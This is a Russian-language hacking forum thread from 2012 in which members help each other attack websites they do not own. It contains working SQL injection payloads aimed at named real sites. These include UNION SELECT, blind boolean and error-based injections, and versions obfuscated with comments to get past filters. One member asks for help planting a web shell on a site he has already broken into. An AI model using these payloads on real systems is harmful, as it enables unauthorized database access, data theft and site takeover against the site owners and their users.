29.03.2012, 01:46
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
|
|
|
29.03.2012, 06:34
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
С нами:
7601366
Репутация:
0
|
|
Сообщение от Faaax
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
Вот писал под себя:
http://www.sendspace.com/file/7h37av
В поле Number пишется либо число колонок либо вставляется ссылка вида http://site.com/index.php?id=1+ORDER+BY+5+--+ если нажать на поле и в буфере будет ссылка такого вида то она автоматически замениться на http://site.com/index.php?id=1+aNd+1=0+UNION+SELECT+1,2,3,4,5+--+
|
|
|
|
29.03.2012, 07:18
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
С нами:
7601366
Репутация:
0
|
|
Сообщение от GaMeSTeR
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Сообщение от Faaax
здесь экстрасенсов нету,сылку в студию
" if author else f"
GaMeSTeR said:
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Сообщение от Faaax
здесь экстрасенсов нету,сылку в студию
Не хотел светить, но чтобы набраться опыта готов пожертвовать)
http://www.ibs.ua/card.php?id=3182+aNd+'1'='0'+UNION+SELECT+version( ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+
Все перепробовал но путь до сайта найти не могу, помогите!
|
|
|
|
29.03.2012, 11:15
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Код:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
|
|
|
|
29.03.2012, 11:39
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
С нами:
7601366
Репутация:
0
|
|
Сообщение от Faaax
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Код:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
Думаю не получиться там фильтрация + если фильтрацию проходим то дописываемся после from'a:
SELECT * ....... from tv1000_db.[sql]_peredacha
|
|
|
|
29.03.2012, 15:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
|
|
|
|
29.03.2012, 16:07
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от qaz
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
Код:
_http://www.imperiya.by/news.html
?id=69799+and+1=(if(ascii(substr(version(),1,1))=53,1,0))--+
как слепую, вывод в заголовке. версия 5.+
|
|
|
|
29.03.2012, 20:11
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
помогите ребята
есть Error:
Код:
http://domain.dm/?s11='
и вывод:
Код:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Код:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить? |
|
|
|
29.03.2012, 20:34
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
С нами:
7601366
Репутация:
0
|
|
Сообщение от \/ITA
помогите ребята
есть Error:
Код:
http://domain.dm/?s11='
и вывод:
Код:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Код:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить? Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
|
|
|
|
29.03.2012, 20:55
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от GaMeSTeR
Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
спасибо друг
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
